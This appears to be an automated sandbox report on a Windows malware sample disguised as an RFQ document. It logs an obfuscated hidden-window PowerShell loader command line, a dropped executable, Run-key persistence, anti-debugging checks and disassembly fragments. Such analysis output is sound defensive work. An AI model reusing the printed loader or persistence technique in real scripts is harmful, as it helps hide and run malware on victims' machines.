Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD95EB pushad ; ret	1_2_04DD95FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD12D8 push esp; retf	1_2_04DD12E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92D3 push edx; ret	1_2_04DD92F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92C7 push ecx; ret	1_2_04DD92D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92F3 push edx; ret	1_2_04DD9302
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9353 push esi; ret	1_2_04DD9372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9343 push ebp; ret	1_2_04DD9352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD933D push ebx; ret	1_2_04DD9342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD932D push ebx; ret	1_2_04DD9332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9D98 push edx; ret	1_2_04DD9E56
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9A58 push eax; ret	1_2_04DD9D96
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07ADC058 pushfd ; ret	1_2_07ADC3A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A2097 push ebx; retf	1_2_089A20BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A296C push ebx; ret	1_2_089A29FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A1F8B push ebx; retf	1_2_089A202A
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02169275 push ds; retf	17_2_02169276
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217704F push cs; retf	17_2_02177050
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0218391B push esp; iretd	17_2_0218396B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02169763 push 00000005h; iretd	17_2_02169765
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02176F61 push ebx; iretd	17_2_02176F6D
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02164789 push esp; ret	17_2_0216478D
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_021734EE push FFFFFF9Ah; iretd	17_2_021734F2
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02173546 push ebx; iretd	17_2_02173500
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217354B push ebx; iretd	17_2_02173500
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D5C43B push cs; retf	17_2_04D5C43C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D68D07 push esp; iretd	17_2_04D68D57
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BEC9 push ss; ret	17_2_04D4BEF1
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BEC9 push edx; iretd	17_2_04D4BF34
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BF14 push edx; iretd	17_2_04D4BF34
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D588DA push FFFFFF9Ah; iretd	17_2_04D588DE
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D58937 push ebx; iretd	17_2_04D588EC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Minken.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Paraferingen			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Paraferingen			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe

Code function: 12_2_231CD1C0 rdtsc

12_2_231CD1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7964	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1570	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Window / User API: threadDelayed 548	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Window / User API: threadDelayed 9425	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	API coverage: 0.5 %
Source: C:\Windows\SysWOW64\fc.exe	API coverage: 2.9 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe TID: 1716	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep count: 548 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep time: -1096000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep count: 9425 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep time: -18850000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0012B5B0 FindFirstFileW,FindNextFileW,FindClose,	18_2_0012B5B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: RFQ-LOTUS 2024.exe, 00000000.00000002.1724752820.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Minken.exe, 0000000C.00000003.2734979919.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`Z
Source: svchost.exe, 00000005.00000002.4126984745.0000024951055000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4126864556.0000024951043000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2734979919.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.4124934957.000002494BA2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	API call chain: ExitProcess graph end node			graph_0-1431
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	API call chain: ExitProcess graph end node			graph_0-1612

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe

Code function: 12_2_231CD1C0 rdtsc

12_2_231CD1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_04CBD6CC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

1_2_04CBD6CC

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C310 mov ecx, dword ptr fs:[00000030h]	12_2_2314C310
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23170310 mov ecx, dword ptr fs:[00000030h]	12_2_23170310
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D mov eax, dword ptr fs:[00000030h]	12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D mov eax, dword ptr fs:[00000030h]	12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]	12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]	12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]	12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]	12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]	12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]	12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23147330 mov eax, dword ptr fs:[00000030h]	12_2_23147330
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F32A mov eax, dword ptr fs:[00000030h]	12_2_2317F32A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov ecx, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]	12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149353 mov eax, dword ptr fs:[00000030h]	12_2_23149353
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149353 mov eax, dword ptr fs:[00000030h]	12_2_23149353
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F367 mov eax, dword ptr fs:[00000030h]	12_2_2320F367
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
